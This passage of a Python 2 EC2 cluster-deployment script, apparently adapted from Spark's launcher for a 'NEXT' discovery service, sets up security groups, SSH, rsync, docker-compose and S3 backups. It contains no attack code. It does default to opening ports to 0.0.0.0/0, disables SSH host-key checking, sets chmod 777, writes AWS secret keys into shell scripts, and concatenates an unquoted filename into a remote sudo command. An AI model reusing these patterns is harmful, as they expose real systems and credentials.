"-D", metavar="[ADDRESS:]PORT", dest="proxy_port",
help="Use SSH dynamic port forwarding to create a SOCKS proxy at " +
"the given local address (for use with login)")
parser.add_option(
"--resume", action="store_true", default=False,
help="Resume installation on a previously launched cluster " +
"(for debugging)")
parser.add_option(
"--ebs-vol-size", metavar="SIZE", type="int", default=0,
help="Size (in GB) of each EBS volume.")
parser.add_option(
"--ebs-vol-type", default="standard",
help="EBS volume type (e.g. 'gp2', 'standard').")
parser.add_option(
"--ebs-vol-num", type="int", default=1,
help="Number of EBS volumes to attach to each node as /vol[x]. " +
"The volumes will be deleted when the instances terminate. " +
"Only possible on EBS-backed AMIs. " +
"EBS volumes are only attached if --ebs-vol-size > 0." +
"Only support up to 8 EBS volumes.")
parser.add_option(
"--root-vol-size", metavar="SIZE", type="int", default=120,
help="Size (in GB) of the root volume.")
parser.add_option(
"--root-vol-num", type="int", default=1,
help="Number of root volumes to attach to each node")
parser.add_option("--placement-group", type="string", default=None,
help="Which placement group to try and launch " +
"instances into. Assumes placement group is already " +
"created.")
parser.add_option(
"--swap", metavar="SWAP", type="int", default=1024,
help="Swap space to set up per node, in MB (default: %default)")
parser.add_option(
"--spot-price", metavar="PRICE", type="float",
help="If specified, launch slaves as spot instances with the given " +
"maximum price (in dollars)")
parser.add_option(
"-u", "--user", default=DEFAULT_USER,
help="The SSH user you want to connect as (default: %default)")
parser.add_option(
"--delete-groups", action="store_true", default=False,
help="When destroying a cluster, delete the security groups that were created")
parser.add_option(
"--use-existing-master", action="store_true", default=False,
help="Launch fresh slaves, but use an existing stopped master if possible")
parser.add_option(
"--worker-instances", type="int", default=1,
help="Number of instances per worker: variable SPARK_WORKER_INSTANCES (default: %default)")
parser.add_option(
"--master-opts", type="string", default="",
help="Extra options to give to master through SPARK_MASTER_OPTS variable " +
"(e.g -Dspark.worker.timeout=180)")
parser.add_option(
"--user-data", type="string", default="",
help="Path to a user-data file (most AMI's interpret this as an initialization script)")
parser.add_option(
"--authorized-address", type="string", default="0.0.0.0/0",
help="Address to authorize on created security groups (default: %default)")
parser.add_option(
"--additional-security-group", type="string", default="",
help="Additional security group to place the machines in")
parser.add_option(
"--copy-aws-credentials", action="store_true", default=False,
help="Add AWS credentials to hadoop configuration to allow Spark to access S3")
parser.add_option(
"--subnet-id", default=None, help="VPC subnet to launch instances in")
parser.add_option(
"--vpc-id", default=None, help="VPC to launch instances in")
parser.add_option(
"--backup-filename", default=None, help="The filename (with extension) of the backup filename on EC2 to backup to or restore from. Only has effect on action={backup,restore}")
parser.add_option(
"--bucket", default=None, help="The name (with extension) of unique bucket to list files from. Only has effect on action={listbucket}")
parser.add_option(
"--prefix", default=None, help="A prefix to filter files in a bucket with. Only has effect on action={listbucket}")
(opts, args) = parser.parse_args()
if len(args) != 2:
parser.print_help()
sys.exit(1)
(action, cluster_name) = args
# Boto config check
# http://boto.cloudhackers.com/en/latest/boto_config_tut.html
home_dir = os.getenv('HOME')
if home_dir is None or not os.path.isfile(home_dir + '/.boto'):
if not os.path.isfile('/etc/boto.cfg'):
if os.getenv('AWS_ACCESS_KEY_ID') is None:
print >> stderr, ("ERROR: The environment variable AWS_ACCESS_KEY_ID " +
"must be set")
sys.exit(1)
if os.getenv('AWS_SECRET_ACCESS_KEY') is None:
print >> stderr, ("ERROR: The environment variable AWS_SECRET_ACCESS_KEY " +
"must be set")
sys.exit(1)
return (opts, action, cluster_name)
# Get the EC2 security group of the given name, creating it if it doesn't exist
def get_or_make_group(conn, name, vpc_id):
groups = conn.get_all_security_groups()
group = [g for g in groups if g.name == name]
if len(group) > 0:
return group[0]
else:
print "Creating security group " + name
return conn.create_security_group(name, "NEXT EC2 group", vpc_id)
# Check whether a given EC2 instance object is in a state we consider active,
# i.e. not terminating or terminated. We count both stopping and stopped as
# active since we can restart stopped clusters.
def is_active(instance):
return (instance.state in ['pending', 'running', 'stopping', 'stopped'])
# Launch a cluster of the given name, by setting up its security groups,
# and then starting new instances in them.
# Returns a tuple of EC2 reservation objects for the master and slaves
# Fails if there are already instances running in the cluster's groups.
def launch_cluster(conn, opts, cluster_name):
if opts.identity_file is None:
print >> stderr, "ERROR: Must provide an identity file (-i) for ssh connections."
sys.exit(1)
if opts.key_pair is None:
print >> stderr, "ERROR: Must provide a key pair name (-k) to use on instances."
sys.exit(1)
user_data_content = None
if opts.user_data:
with open(opts.user_data) as user_data_file:
user_data_content = user_data_file.read()
print "Setting up security groups..."
master_group = get_or_make_group(conn, cluster_name + "-master", opts.vpc_id)
if opts.slaves>0: slave_group = get_or_make_group(conn, cluster_name + "-slaves", opts.vpc_id)
authorized_address = opts.authorized_address
if master_group.rules == []: # Group was just now created
if opts.slaves>0:
if opts.vpc_id is None:
master_group.authorize(src_group=master_group)
master_group.authorize(src_group=slave_group)
else:
master_group.authorize(ip_protocol='icmp', from_port=-1, to_port=-1,
src_group=master_group)
master_group.authorize(ip_protocol='tcp', from_port=0, to_port=65535,
src_group=master_group)
master_group.authorize(ip_protocol='udp', from_port=0, to_port=65535,
src_group=master_group)
master_group.authorize(ip_protocol='icmp', from_port=-1, to_port=-1,
src_group=slave_group)
master_group.authorize(ip_protocol='tcp', from_port=0, to_port=65535,
src_group=slave_group)
master_group.authorize(ip_protocol='udp', from_port=0, to_port=65535,
src_group=slave_group)
master_group.authorize('tcp', 22, 22, authorized_address)
master_group.authorize('tcp', NEXT_BACKEND_GLOBAL_PORT, NEXT_BACKEND_GLOBAL_PORT, authorized_address)
#master_group.authorize('tcp', NEXT_FRONTEND_BASE_GLOBAL_PORT, NEXT_FRONTEND_BASE_GLOBAL_PORT, authorized_address)
master_group.authorize('tcp', NEXT_FRONTEND_GLOBAL_PORT, NEXT_FRONTEND_GLOBAL_PORT, authorized_address)
master_group.authorize('tcp', 5555, 5555, authorized_address)
master_group.authorize('tcp', 8888, 8888, authorized_address)
master_group.authorize('tcp', 15672, 15672, authorized_address)
master_group.authorize('tcp', 28017, 28017, authorized_address)
if opts.slaves>0 and slave_group.rules == []: # Group was just now created
if opts.vpc_id is None:
slave_group.authorize(src_group=master_group)
slave_group.authorize(src_group=slave_group)
else:
slave_group.authorize(ip_protocol='icmp', from_port=-1, to_port=-1,
src_group=master_group)
slave_group.authorize(ip_protocol='tcp', from_port=0, to_port=65535,
src_group=master_group)
slave_group.authorize(ip_protocol='udp', from_port=0, to_port=65535,
src_group=master_group)
slave_group.authorize(ip_protocol='icmp', from_port=-1, to_port=-1,
src_group=slave_group)
slave_group.authorize(ip_protocol='tcp', from_port=0, to_port=65535,
src_group=slave_group)
slave_group.authorize(ip_protocol='udp', from_port=0, to_port=65535,
src_group=slave_group)
slave_group.authorize('tcp', 22, 22, authorized_address)
# Check if instances are already running in our groups
existing_masters, existing_slaves = get_existing_cluster(conn, opts, cluster_name,
die_on_error=False)
if existing_slaves or (existing_masters and not opts.use_existing_master):
print >> stderr, ("ERROR: There are already instances running in " +
"the desired group")
sys.exit(1)
# we use group ids to work around https://github.com/boto/boto/issues/350
additional_group_ids = []
if opts.additional_security_group:
additional_group_ids = [sg.id
for sg in conn.get_all_security_groups()
if opts.additional_security_group in (sg.name, sg.id)]
print "Launching instances..."
try:
image = conn.get_all_images(image_ids=[opts.ami])[0]
except:
print >> stderr, "Could not find AMI " + opts.ami
sys.exit(1)
# Create block device mapping so that we can add EBS volumes if asked to.
# The first drive is attached as /dev/sds, 2nd as /dev/sdt, ... /dev/sdz
block_map = BlockDeviceMapping()
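    # With the defaults (--root-vol-num=1) the loop below maps the root volume
    # to /dev/sda1; additional root volumes would be named /dev/sdb2, /dev/sdc3, ...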
# if opts.instance_type.startswith('m3.'):
for i in range(opts.root_vol_num):
dev = EBSBlockDeviceType()
dev.size = opts.root_vol_size
# dev.ephemeral_name = 'ephemeral%d' % i
# The first ephemeral drive is /dev/sda1.
name = '/dev/sd' + string.letters[i] + str(i+1)
block_map[name] = dev
if opts.ebs_vol_size > 0:
for i in range(opts.ebs_vol_num):
device = EBSBlockDeviceType()
device.size = opts.ebs_vol_size
device.volume_type = opts.ebs_vol_type
device.delete_on_termination = True
block_map["/dev/sd" + chr(ord('s') + i)] = device
# Launch slaves
if opts.slaves>0:
if opts.spot_price is not None:
# Launch spot instances with the requested price
print ("Requesting %d slaves as spot instances with price $%.3f" %
(opts.slaves, opts.spot_price))
zones = get_zones(conn, opts)
num_zones = len(zones)
i = 0
my_req_ids = []
for zone in zones:
num_slaves_this_zone = get_partition(opts.slaves, num_zones, i)
slave_reqs = conn.request_spot_instances(
price=opts.spot_price,
image_id=opts.ami,
launch_group="launch-group-%s" % cluster_name,
placement=zone,
count=num_slaves_this_zone,
key_name=opts.key_pair,
security_group_ids=[slave_group.id] + additional_group_ids,
instance_type=opts.instance_type,
block_device_map=block_map,
subnet_id=opts.subnet_id,
placement_group=opts.placement_group,
user_data=user_data_content)
my_req_ids += [req.id for req in slave_reqs]
i += 1
print "Waiting for spot instances to be granted..."
try:
while True:
time.sleep(10)
reqs = conn.get_all_spot_instance_requests()
id_to_req = {}
for r in reqs:
id_to_req[r.id] = r
active_instance_ids = []
for i in my_req_ids:
if i in id_to_req and id_to_req[i].state == "active":
active_instance_ids.append(id_to_req[i].instance_id)
if len(active_instance_ids) == opts.slaves:
print "All %d slaves granted" % opts.slaves
reservations = conn.get_all_reservations(active_instance_ids)
slave_nodes = []
for r in reservations:
slave_nodes += r.instances
break
else:
print "%d of %d slaves granted, waiting longer" % (
len(active_instance_ids), opts.slaves)
except:
print "Canceling spot instance requests"
conn.cancel_spot_instance_requests(my_req_ids)
# Log a warning if any of these requests actually launched instances:
(master_nodes, slave_nodes) = get_existing_cluster(
conn, opts, cluster_name, die_on_error=False)
running = len(master_nodes) + len(slave_nodes)
if running:
print >> stderr, ("WARNING: %d instances are still running" % running)
sys.exit(0)
else:
# Launch non-spot instances
zones = get_zones(conn, opts)
num_zones = len(zones)
i = 0
slave_nodes = []
for zone in zones:
num_slaves_this_zone = get_partition(opts.slaves, num_zones, i)
if num_slaves_this_zone > 0:
slave_res = image.run(key_name=opts.key_pair,
security_group_ids=[slave_group.id] + additional_group_ids,
instance_type=opts.instance_type,
placement=zone,
min_count=num_slaves_this_zone,
max_count=num_slaves_this_zone,
block_device_map=block_map,
subnet_id=opts.subnet_id,
placement_group=opts.placement_group,
user_data=user_data_content)
slave_nodes += slave_res.instances
print "Launched %d slaves in %s, regid = %s" % (num_slaves_this_zone,
zone, slave_res.id)
i += 1
else:
slave_nodes = []
# Launch or resume masters
if existing_masters:
print "Starting master..."
for inst in existing_masters:
if inst.state not in ["shutting-down", "terminated"]:
inst.start()
master_nodes = existing_masters
else:
master_type = opts.master_instance_type
if master_type == "":
master_type = opts.instance_type
if opts.zone == 'all':
opts.zone = random.choice(conn.get_all_zones()).name
master_res = image.run(key_name=opts.key_pair,
security_group_ids=[master_group.id] + additional_group_ids,
instance_type=master_type,
placement=opts.zone,
min_count=1,
max_count=1,
block_device_map=block_map,
subnet_id=opts.subnet_id,
placement_group=opts.placement_group,
user_data=user_data_content)
master_nodes = master_res.instances
print "Launched master in %s, regid = %s" % (opts.zone, master_res.id)
# This wait time corresponds to SPARK-4983
print "Waiting for AWS to propagate instance metadata..."
time.sleep(5)
# Give the instances descriptive names
for master in master_nodes:
master.add_tag(
key='Name',
value='{cn}-master-{iid}'.format(cn=cluster_name, iid=master.id))
for slave in slave_nodes:
slave.add_tag(
key='Name',
value='{cn}-slave-{iid}'.format(cn=cluster_name, iid=slave.id))
# Return all the instances
return (master_nodes, slave_nodes)
# Get the EC2 instances in an existing cluster if available.
# Returns a tuple of lists of EC2 instance objects for the masters and slaves
def get_existing_cluster(conn, opts, cluster_name, die_on_error=True):
print "Searching for existing cluster " + cluster_name + "..."
reservations = conn.get_all_reservations()
master_nodes = []
slave_nodes = []
for res in reservations:
active = [i for i in res.instances if is_active(i)]
for inst in active:
group_names = [g.name for g in inst.groups]
if (cluster_name + "-master") in group_names:
master_nodes.append(inst)
elif (cluster_name + "-slaves") in group_names:
slave_nodes.append(inst)
if any((master_nodes, slave_nodes)):
print "Found %d master(s), %d slaves" % (len(master_nodes), len(slave_nodes))
if master_nodes != [] or not die_on_error:
return (master_nodes, slave_nodes)
else:
if master_nodes == [] and slave_nodes != []:
print >> sys.stderr, "ERROR: Could not find master in group " + cluster_name + "-master"
else:
print >> sys.stderr, "ERROR: Could not find any existing cluster"
sys.exit(1)
# Deploy configuration files and run setup scripts on a newly launched
# or started EC2 cluster.
def setup_cluster(conn, master_nodes, slave_nodes, opts, deploy_ssh_key):
master = master_nodes[0].public_dns_name
if deploy_ssh_key:
print "Generating cluster's SSH key on master..."
key_setup = """
[ -f ~/.ssh/id_rsa ] ||
(ssh-keygen -q -t rsa -N '' -f ~/.ssh/id_rsa &&
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys)
"""
ssh(master, opts, key_setup)
dot_ssh_tar = ssh_read(master, opts, ['tar', 'c', '.ssh'])
print "Transferring cluster's SSH key to slaves..."
for slave in slave_nodes:
print slave.public_dns_name
ssh_write(slave.public_dns_name, opts, ['tar', 'x'], dot_ssh_tar)
print "Running setup on master..."
setup_next_cluster(master, opts)
print "Done!"
print "Start rsync of local next-discovery source code up"
rsync_dir(LOCAL_NEXT_PATH, EC2_NEXT_PATH, opts, master)
print "Done!"
print "Running docker-compose up on master..."
docker_up(opts, master_nodes, slave_nodes)
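# rsync a local directory up to a remote host over ssh. With the defaults above
# the assembled command is roughly (illustrative):
#   rsync --exclude=.git --exclude=archive -rve 'ssh -o StrictHostKeyChecking=no ... -i <key>' ./../ ubuntu@<host>:/usr/local/next-discovery/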
def rsync_dir(local_src_dir, ec2_dest_dir, opts, host):
command = [
'rsync', '--exclude=.git', '--exclude=archive', '-rve',
stringify_command(ssh_command(opts)),
"%s" % local_src_dir,
"%s@%s:%s/" % (opts.user, host, ec2_dest_dir)
]
subprocess.check_call(command)
def setup_next_cluster(master, opts):
# Create a temp directory in which we will place all the files to be
    # deployed after we substitute template parameters in them
tmp_dir = tempfile.mkdtemp()
with open('./templates/setup.sh') as src:
with open(tmp_dir+'/setup.sh', "w") as dest:
text = src.read()
# text = text.replace("{{ environment_variables }}",env_vars)
dest.write(text)
dest.close()
# rsync the whole directory over to the master machine
ssh(master, opts, "sudo rm -rf " + EC2_NEXT_PATH)
ssh(master, opts, "sudo mkdir " + EC2_NEXT_PATH)
ssh(master, opts, "sudo chmod 777 " + EC2_NEXT_PATH)
command = [
'rsync', '-rv',
'-e', stringify_command(ssh_command(opts)),
"%s/" % tmp_dir,
"%s@%s:%s/" % (opts.user, master, EC2_NEXT_PATH)
]
subprocess.check_call(command)
# Remove the temp directory we created above
shutil.rmtree(tmp_dir)
ssh(master, opts, "sudo chmod 777 " + EC2_NEXT_PATH + '/' + 'setup.sh')
ssh(master, opts, 'sudo ' + EC2_NEXT_PATH + '/' + 'setup.sh')
def docker_up(opts, master_nodes, slave_nodes):
rsync_docker_config(opts, master_nodes, slave_nodes)
master = master_nodes[0].public_dns_name
ssh(master, opts, "sudo chmod 777 " + EC2_NEXT_PATH + '/' + 'docker_up.sh')
ssh(master, opts, 'sudo ' + EC2_NEXT_PATH + '/' + 'docker_up.sh')
def docker_login(opts, master_nodes, slave_nodes):
rsync_docker_config(opts, master_nodes, slave_nodes)
master = master_nodes[0].public_dns_name
import signal
def preexec_function():
# Ignore the SIGINT signal by setting the handler to the standard
# signal handler SIG_IGN.
signal.signal(signal.SIGINT, signal.SIG_IGN)
ssh(master, opts, "sudo chmod 777 " + EC2_NEXT_PATH + '/' + 'docker_login.sh')
ssh(master, opts, 'sudo ' + EC2_NEXT_PATH + '/' + 'docker_login.sh')
def list_bucket(opts):
AWS_ACCESS_KEY_ID = os.getenv('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = os.getenv('AWS_SECRET_ACCESS_KEY')
conn = boto.connect_s3( AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY )
print "Trying to connect to bucket %s"%(opts.bucket)
try:
bucket = conn.get_bucket( opts.bucket )
if hasattr(opts,'prefix'):
print [ key.name.encode( "utf-8" ) for key in bucket.list(prefix=opts.prefix) ]
else:
print [ key.name.encode( "utf-8" ) for key in bucket.list() ]
except boto.exception.S3ResponseError, e:
print "This bucket does not exist. Please create a new bucket using createbucket command."
def createbucket(opts):
AWS_ACCESS_KEY_ID = os.getenv('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = os.getenv('AWS_SECRET_ACCESS_KEY')
conn = boto.connect_s3( AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY )
gotbucket = False
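    # Keep generating random 30-character hex names until S3 accepts one;
    # bucket names must be globally unique across all AWS accounts.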
while not gotbucket:
bucket_uid = '%030x' % random.randrange(16**30)
try:
newbucket = conn.create_bucket(bucket_uid)
gotbucket = True
except boto.exception.S3CreateError, e:
pass
print 'Your AWS S3 bucket has been successfully created with bucket name set as: ', bucket_uid
print
print 'To automatically use this bucket, input the following command into your terminal:'
print 'export AWS_BUCKET_NAME='+bucket_uid
def rsync_docker_config(opts, master_nodes, slave_nodes):
master = master_nodes[0].public_dns_name
opts.master_instance_type = master_nodes[0].instance_type
if len(slave_nodes)>0:
opts.instance_type = slave_nodes[0].instance_type
master_num_cpus = instance_info[opts.master_instance_type]['cpu']
slave_num_cpus = instance_info[opts.instance_type]['cpu']
# Create a temp directory in which we will place all the files to be
    # deployed after we substitute template parameters in them
tmp_dir = tempfile.mkdtemp()
master_environment_vars = {
"MASTER_LIST": ','.join([i.public_dns_name for i in master_nodes]),
"ACTIVE_MASTER": master,
"SLAVE_LIST": ','.join([i.public_dns_name for i in slave_nodes]),
"NEXT_BACKEND_GLOBAL_HOST": master,
"NEXT_BACKEND_GLOBAL_PORT": NEXT_BACKEND_GLOBAL_PORT,
"NEXT_FRONTEND_GLOBAL_HOST":master,
"NEXT_FRONTEND_GLOBAL_PORT":NEXT_FRONTEND_GLOBAL_PORT,
"AWS_ACCESS_ID":os.getenv('AWS_ACCESS_KEY_ID'),
"AWS_SECRET_ACCESS_KEY":os.getenv('AWS_SECRET_ACCESS_KEY'),
"AWS_BUCKET_NAME":os.getenv('AWS_BUCKET_NAME','next-database-backups')
}
with open('./templates/docker_login.sh') as src:
with open(tmp_dir+'/docker_login.sh', "w") as dest:
text = src.read()
env_vars = ''
for key in master_environment_vars:
env_vars += 'export ' + str(key) + '=' + str(master_environment_vars[key]) + '\n'
text = text.replace("{{ environment_variables }}",env_vars)
dest.write(text)
dest.close()
with open('./templates/docker_up.sh') as src:
with open(tmp_dir+'/docker_up.sh', "w") as dest:
text = src.read()
env_vars = ''
for key in master_environment_vars:
env_vars += 'export ' + str(key) + '=' + str(master_environment_vars[key]) + '\n'
text = text.replace("{{ environment_variables }}",env_vars)
dest.write(text)
dest.close()
    num_sync_workers = 6 # should be about the number of active algorithms
unicorn_multiplier = .15
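    # The worker counts below scale with the CPU count of the master instance:
    # roughly 0.15 gunicorn workers per core (plus one), and about a third of
    # the cores as threads per async celery worker.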
docker_compose_template_vars = {
"DATABASE_NUM_GUNICORN_WORKERS":int(unicorn_multiplier*master_num_cpus+1),
"CELERY_SYNC_WORKER_COUNT": num_sync_workers,
"CELERY_ASYNC_WORKER_COUNT":2,
"CELERY_THREADS_PER_ASYNC_WORKER":max(1,int(.35*master_num_cpus)),
"NEXT_BACKEND_NUM_GUNICORN_WORKERS":int(unicorn_multiplier*master_num_cpus+1),
"NEXT_BACKEND_GLOBAL_PORT":NEXT_BACKEND_GLOBAL_PORT,
"NEXT_FRONTEND_NUM_GUNICORN_WORKERS":int(unicorn_multiplier*master_num_cpus+1),
"NEXT_FRONTEND_GLOBAL_PORT":NEXT_FRONTEND_GLOBAL_PORT
}
with open('./templates/docker-compose.yml') as src:
with open(tmp_dir+'/docker-compose.yml', "w") as dest:
text = src.read()
env_vars = ''
for key in docker_compose_template_vars:
text = text.replace("{{" + key + "}}",str(docker_compose_template_vars[key]))
dest.write(text)
dest.close()
print text
# rsync the whole directory over to the master machine
command = [
'rsync', '-rv',
'-e', stringify_command(ssh_command(opts)),
"%s/" % tmp_dir,
"%s@%s:%s/" % (opts.user, master, EC2_NEXT_PATH)
]
subprocess.check_call(command)
# Remove the temp directory we created above
shutil.rmtree(tmp_dir)
def is_ssh_available(host, opts, print_ssh_output=True):
"""
Check if SSH is available on a host.
"""
s = subprocess.Popen(
ssh_command(opts) + ['-t', '-t', '-o', 'ConnectTimeout=3',
'%s@%s' % (opts.user, host), stringify_command('true')],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT # we pipe stderr through stdout to preserve output order
)
cmd_output = s.communicate()[0] # [1] is stderr, which we redirected to stdout
if s.returncode != 0 and print_ssh_output:
# extra leading newline is for spacing in wait_for_cluster_state()
print textwrap.dedent("""\n
Warning: SSH connection error. (This could be temporary.)
Host: {h}
SSH return code: {r}
SSH output: {o}
""").format(
h=host,
r=s.returncode,
o=cmd_output.strip()
)
return s.returncode == 0
def is_cluster_ssh_available(cluster_instances, opts):
"""
Check if SSH is available on all the instances in a cluster.
"""
for i in cluster_instances:
if not is_ssh_available(host=i.public_dns_name, opts=opts):
return False
else:
return True
def wait_for_cluster_state(conn, opts, cluster_instances, cluster_state):
"""
Wait for all the instances in the cluster to reach a designated state.
cluster_instances: a list of boto.ec2.instance.Instance
cluster_state: a string representing the desired state of all the instances in the cluster
value can be 'ssh-ready' or a valid value from boto.ec2.instance.InstanceState such as
'running', 'terminated', etc.
(would be nice to replace this with a proper enum: http://stackoverflow.com/a/1695250)
"""
sys.stdout.write(
"Waiting for cluster to enter '{s}' state.".format(s=cluster_state)
)
sys.stdout.flush()
start_time = datetime.now()
num_attempts = 0
while True:
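        # Sleep about 1 second before the first status check, then back off to
        # roughly 11 seconds between subsequent polls.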
time.sleep(10*( 1.*(num_attempts>0) + 0.1)) # seconds
for i in cluster_instances:
i.update()
statuses = conn.get_all_instance_status(instance_ids=[i.id for i in cluster_instances])
if cluster_state == 'ssh-ready':
if all(i.state == 'running' for i in cluster_instances) and \
all(s.system_status.status == 'ok' for s in statuses) and \
all(s.instance_status.status == 'ok' for s in statuses) and \
is_cluster_ssh_available(cluster_instances, opts):
break
else:
if all(i.state == cluster_state for i in cluster_instances):
break
num_attempts += 1
sys.stdout.write(".")
sys.stdout.flush()
sys.stdout.write("\n")
end_time = datetime.now()
print "Cluster is now in '{s}' state. Waited {t} seconds.".format(
s=cluster_state,
t=(end_time - start_time).seconds
)
def stringify_command(parts):
if isinstance(parts, str):
return parts
else:
return ' '.join(map(pipes.quote, parts))
def ssh_args(opts):
parts = ['-o', 'StrictHostKeyChecking=no']
parts += ['-o', 'UserKnownHostsFile=/dev/null']
if opts.identity_file is not None:
parts += ['-i', opts.identity_file]
return parts
def ssh_command(opts):
return ['ssh'] + ssh_args(opts)
# Run a command on a host through ssh, retrying up to five times
# and then throwing an exception if ssh continues to fail.
def ssh(host, opts, command):
tries = 0
while True:
try:
return subprocess.check_call(
ssh_command(opts) + ['-t', '-t', '%s@%s' % (opts.user, host),
stringify_command(command)])
except subprocess.CalledProcessError as e:
if tries > 5:
# If this was an ssh failure, provide the user with hints.
if e.returncode == 255:
raise UsageError(
"Failed to SSH to remote host {0}.\n" +
"Please check that you have provided the correct --identity-file and " +
"--key-pair parameters and try again.".format(host))
else:
raise e
print >> stderr, \
"Error executing remote command, retrying after 30 seconds: {0}".format(e)
time.sleep(30)
tries = tries + 1
# Backported from Python 2.7 for compatibility with 2.6 (See SPARK-1990)
def _check_output(*popenargs, **kwargs):
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(retcode, cmd, output=output)
return output
def ssh_read(host, opts, command):
return _check_output(
ssh_command(opts) + ['%s@%s' % (opts.user, host), stringify_command(command)])
def ssh_write(host, opts, command, arguments):
tries = 0
while True:
proc = subprocess.Popen(
ssh_command(opts) + ['%s@%s' % (opts.user, host), stringify_command(command)],
stdin=subprocess.PIPE)
proc.stdin.write(arguments)
proc.stdin.close()
status = proc.wait()
if status == 0:
break
elif tries > 5:
raise RuntimeError("ssh_write failed with error %s" % proc.returncode)
else:
print >> stderr, \
"Error {0} while executing remote command, retrying after 30 seconds".format(status)
time.sleep(30)
tries = tries + 1
# Gets a list of zones to launch instances in
def get_zones(conn, opts):
if opts.zone == 'all':
zones = [z.name for z in conn.get_all_zones()]
else:
zones = [opts.zone]
return zones
# Gets the number of items in a partition
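# Illustrative example: splitting total=10 slaves across num_partitions=3 zones
# yields 4 instances for partition 0 and 3 each for partitions 1 and 2.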
def get_partition(total, num_partitions, current_partitions):
num_slaves_this_zone = total / num_partitions
if (total % num_partitions) - current_partitions > 0:
num_slaves_this_zone += 1
return num_slaves_this_zone
def real_main():
(opts, action, cluster_name) = parse_args()
print 'opts : ' + str(opts)
print
print 'cluster_name : ' + str(cluster_name)
print
if opts.ebs_vol_num > 8:
print >> stderr, "ebs-vol-num cannot be greater than 8"
sys.exit(1)
try:
conn = ec2.connect_to_region(opts.region)
except Exception as e:
print >> stderr, (e)
sys.exit(1)
# Select an AZ at random if it was not specified.
if opts.zone == "":
opts.zone = random.choice(conn.get_all_zones()).name
if action == "launch":
if opts.resume:
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
else:
(master_nodes, slave_nodes) = launch_cluster(conn, opts, cluster_name)
wait_for_cluster_state(
conn=conn,
opts=opts,
cluster_instances=(master_nodes + slave_nodes),
cluster_state='ssh-ready'
)
setup_cluster(conn, master_nodes, slave_nodes, opts, True)
elif action == "destroy":
print "Are you sure you want to destroy the cluster %s?" % cluster_name
print "The following instances will be terminated:"
(master_nodes, slave_nodes) = get_existing_cluster(
conn, opts, cluster_name, die_on_error=False)
for inst in master_nodes + slave_nodes:
print "> %s" % inst.public_dns_name
msg = "ALL DATA ON ALL NODES WILL BE LOST!!\nDestroy cluster %s (y/N): " % cluster_name
response = raw_input(msg)
if response == "y":
print "Terminating master..."
for inst in master_nodes:
inst.terminate()
print "Terminating slaves..."
for inst in slave_nodes:
inst.terminate()
# Delete security groups as well
if opts.delete_groups:
print "Deleting security groups (this will take some time)..."
group_names = [cluster_name + "-master", cluster_name + "-slaves"]
wait_for_cluster_state(
conn=conn,
opts=opts,
cluster_instances=(master_nodes + slave_nodes),
cluster_state='terminated'
)
attempt = 1
while attempt <= 3:
print "Attempt %d" % attempt
groups = [g for g in conn.get_all_security_groups() if g.name in group_names]
success = True
# Delete individual rules in all groups before deleting groups to
# remove dependencies between them
for group in groups:
print "Deleting rules in security group " + group.name
for rule in group.rules:
for grant in rule.grants:
success &= group.revoke(ip_protocol=rule.ip_protocol,
from_port=rule.from_port,
to_port=rule.to_port,
src_group=grant)
# Sleep for AWS eventual-consistency to catch up, and for instances
# to terminate
time.sleep(30) # Yes, it does have to be this long :-(
for group in groups:
try:
# It is needed to use group_id to make it work with VPC
conn.delete_security_group(group_id=group.id)
print "Deleted security group %s" % group.name
except boto.exception.EC2ResponseError:
success = False
print "Failed to delete security group %s" % group.name
# Unfortunately, group.revoke() returns True even if a rule was not
# deleted, so this needs to be rerun if something fails
if success:
break
attempt += 1
if not success:
print "Failed to delete all security groups after 3 tries."
print "Try re-running in a few minutes."
elif action == "login":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
master = master_nodes[0].public_dns_name
print "Logging into master " + master + "..."
proxy_opt = []
if opts.proxy_port is not None:
proxy_opt = ['-D', opts.proxy_port]
subprocess.check_call(
ssh_command(opts) + proxy_opt + ['-t', '-t', "%s@%s" % (opts.user, master)])
elif action == "reboot-slaves":
response = raw_input(
"Are you sure you want to reboot the cluster " +
cluster_name + " slaves?\n" +
"Reboot cluster slaves " + cluster_name + " (y/N): ")
if response == "y":
(master_nodes, slave_nodes) = get_existing_cluster(
conn, opts, cluster_name, die_on_error=False)
print "Rebooting slaves..."
for inst in slave_nodes:
if inst.state not in ["shutting-down", "terminated"]:
print "Rebooting " + inst.id
inst.reboot()
elif action == "get-master":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
print 'public_dns_name : \t' + master_nodes[0].public_dns_name
print 'instance_type \t : \t' + master_nodes[0].instance_type
print 'num_cpus \t : \t' + str(instance_info[master_nodes[0].instance_type]['cpu'])
print 'memory (GB) \t : \t' + str(instance_info[master_nodes[0].instance_type]['memory'])
print 'cost ($/hr) \t : \t' + str(instance_info[master_nodes[0].instance_type]['cost_per_hr'])
elif action == "rsync":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
master = master_nodes[0].public_dns_name
rsync_dir(LOCAL_NEXT_PATH, EC2_NEXT_PATH, opts, master)
rsync_docker_config(opts, master_nodes, slave_nodes)
elif action == "docker_up":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
docker_up(opts, master_nodes, slave_nodes)
elif action == "docker_login":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
docker_login(opts, master_nodes, slave_nodes)
elif action == "backup":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
master = master_nodes[0].public_dns_name
# opts.backup_filename
command = "cd %s; sudo docker exec nextdiscovery_mongodbbackup_1 /bin/bash -c 'python ./next/database/database_backup.py %s' " % (EC2_NEXT_PATH,opts.backup_filename)
ssh(master, opts, command)
elif action == "restore":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
master = master_nodes[0].public_dns_name
# opts.backup_filename
